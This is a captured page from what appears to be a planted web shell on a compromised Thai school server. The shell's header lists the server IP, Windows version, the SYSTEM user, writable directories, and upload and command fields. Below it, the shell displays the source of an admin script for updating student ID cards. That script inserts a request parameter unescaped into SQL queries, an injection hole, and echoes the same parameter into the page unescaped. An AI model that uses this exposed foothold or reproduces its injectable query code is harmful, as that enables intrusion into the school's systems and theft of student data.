403Webshell
Server IP : 172.67.187.206  /  Your IP : 172.71.28.156
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Inetpub/www/myschool/triamudom/check/webadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /Inetpub/www/myschool/triamudom/check/webadmin//display_student_checkcard.php
<?php
session_start();
$path = "../";
include ($path.'include/config_db.php');
include ($path.'include/class_db.php'); 
include ($path.'include/class_display.php'); 
include ($path.'include/function.php'); 
include ($path.'include/permission_denied.php'); 
$CLASS['db']   = new db();
$CLASS['db']->connect(); 
$CLASS['disp']   = new display();
$db   = $CLASS['db']; 
$disp   = $CLASS['disp']; 

$tb_student_code = $_REQUEST['tb_student_code'];

//----------------------------ค่าพื้นฐานระบบเว็บไซต์-----------------------------//
$fetch_public = $db->fetch_array($db->query("select * from tb_public"));
//----------------------------ค่าพื้นฐานระบบเว็บไซต์-----------------------------//
$fetch_student_view = $db->fetch_array($db->query("select * from tb_students where tb_student_code='".$tb_student_code."' "));
$numrow_disall_stu = $db->num_rows($db->query("select * from tb_students where tb_student_code='".$tb_student_code."'  and tb_student_status ='1' "));

if($numrow_disall_stu !="0"){
//--------------------ส่วนบนใช้สำหรับประกาศตัวแปรและ Config เท่านั้น----------------------------//
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title><?php print $fetch_public['tb_public_title_admin'];?></title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link href="css/style_admin.css" rel="stylesheet" type="text/css">
<SCRIPT type="text/javascript"  src="js/format.js"></SCRIPT>
<SCRIPT type="text/javascript"  src="js/global.js" ></SCRIPT>
<SCRIPT type="text/javascript"  src="js/dtree.js"  ></SCRIPT>
<SCRIPT type="text/javascript" src="../include/souc_java.js"></SCRIPT>
<style type="text/css">
<!--
.style2 {font-size: 36px}
-->
</style>
<script type="text/javascript">
 function FocusOnInput()
 {
 document.getElementById("tb_student_codecard").focus();
 }
 </script>
</HEAD>
<BODY onload="FocusOnInput()">
<TABLE width=100% height="100%" border=0 cellPadding=0 cellSpacing=0>
	<tbODY>
		<TR>
			<TD width=100% height=100 align="left" vAlign=top ><?php include_once('header_admin.php'); ?></TD>
		</TR>
		<TR height="100%" >
		  <TD width="100%" height="100%" vAlign=top>
				<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0 >
					<tbODY>
						<TR>
						<TD width=200 rowSpan=2 vAlign=top id=nav><?php include_once('left_nav.php'); ?></TD>
							<TD width=3 height=1 bgcolor="#f1f1f1"><img src="images/spacer.gif" width="3" height="1"></TD>
						  <TD width="100%" rowSpan=2 align="left" vAlign=top style="PADDING-LEFT: 3px; PADDING-RIGHT: 0px;">							
								<table cellspacing="0" cellpadding="0" width="100%" border="0">
								  <tbody>
									<tr>
									  <td rowspan="2"><img src="images/i_setup.gif" width="65" height="44" border="0"></td>
									  <td width="100%" height="24">&nbsp;</td>
									  <td>&nbsp;</td>
									</tr>
									<tr>
									  <td  align="left" width="100%" 
										  background="images/bg_part.gif"><B><font color="#000000">เข้าระบบโดย : <?php print $_SESSION['sessionadmin_name'];?>  <?php print $_SESSION['sessionadmin_sername'];?></font></B></td>
									  <td><img src="images/end_part.gif" width="25" height="20"></td>
									</tr>
								 </tbody>
								</table>
            				</br>
            				<table width="100%" border="0" cellspacing="3" cellpadding="3">
                              <tr>
                                <td>&nbsp;</td>
                                <td>&nbsp;</td>
                              </tr>
                              <tr>
                                <td colspan="2" align="center"><table width="70%" border="0" align="center" cellpadding="0" cellspacing="0">

                                  <tr>
                                    <td align="center" valign="top" nowrap="nowrap" class="orange_textcheck"><img src="../webadmin/images/new_ques.gif" width="24" height="24" align="absmiddle" /> ผลการค้นหาข้อมูลของ</td>
                                  </tr>

                                  <tr>
                                    <td align="center" valign="top" nowrap="nowrap">&nbsp;</td>
                                  </tr>
                                  <tr>
                                    <td align="center" valign="top" nowrap="nowrap"><span class="orange_textcheck"><?php print display_nametype($fetch_student_view['tb_student_tname']);?><?php print $fetch_student_view['tb_student_name'];?> <?php print $fetch_student_view['tb_student_sname'];?></span></td>
                                  </tr>
                                  <tr>
                                    <td align="center" valign="top" nowrap="nowrap">&nbsp;</td>
                                  </tr>
                                  <tr>
                                    <td align="center" valign="top" nowrap="nowrap"><span class="orange_textcheck">ระดับชั้น <?php print $disp->display_roomname($fetch_student_view['tb_student_degree']);?></span></td>
                                  </tr>
                                  <tr>
                                    <td height="15" background="images/la21/bcontent_19.jpg"></td>
                                  </tr>
                                </table></td>
                              </tr>
                              <tr>
                                <td colspan="2" align="center"><form id="form1" name="form1" method="post" action="function_update_codecard.php" enctype="multipart/form-data">
								<input name="tb_student_code" type="hidden" value="<?php print $tb_student_code;?>" />
								<input name="tb_student_id" type="hidden" value="<?php print $fetch_student_view['tb_student_id'];?>" />
                      <table width="100%" border="0" cellspacing="2" cellpadding="2">
                        <tr>
                          <td width="50%" align="right" nowrap="nowrap" class="orange_textcheck"><strong>SCAN CODE CARD  : </strong></td>
                          <td width="50%" nowrap="nowrap"><input name="tb_student_codecard" type="text" class="boxcheckry" id="tb_student_codecard" size="16"></td>
                        </tr>
                        <tr>
                          <td colspan="2" align="center"><label>
                            <input name="Submit" type="submit" class="Submit" value="อัพเดท Card" />
                          </label></td>
                        </tr>
                      </table>
                      &nbsp;
                                </form></td>
                              </tr>
                              <tr>
                                <td>&nbsp;</td>
                                <td>&nbsp;</td>
                              </tr>
                            </table></TD>
						</TR>
        				<TR>
          					<TD height=100% vAlign=top background="images/vline.gif">
          						<IMG src="images/h1_.gif" width="8" height="100" id=ctrlMnu style="CURSOR: hand" onClick="ShowHidePanel('nav', 'ctrlMnu')" onMouseOver="this.style.filter='alpha(opacity=65);'" onMouseOut="this.style.filter='alpha(opacity=100);'"></TD>
						</TR>
					</tbODY>
				</TABLE>		  </TD>
		</TR>
		<TR height="100%" >
		  <TD height="30" vAlign=bottom><?php include_once('footer.php'); ?></TD>
	  </TR>
	</tbODY>
</TABLE>
</BODY>
</html>
<?php 
	}else{
?>
	<script language='javascript'>
		alert("ไม่มีรหัสนักเรียนคนนี้ในฐานข้อมูลของโรงเรียน");
		window.location.href='display_setupcard.php';
	</script>
<?php	
	}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit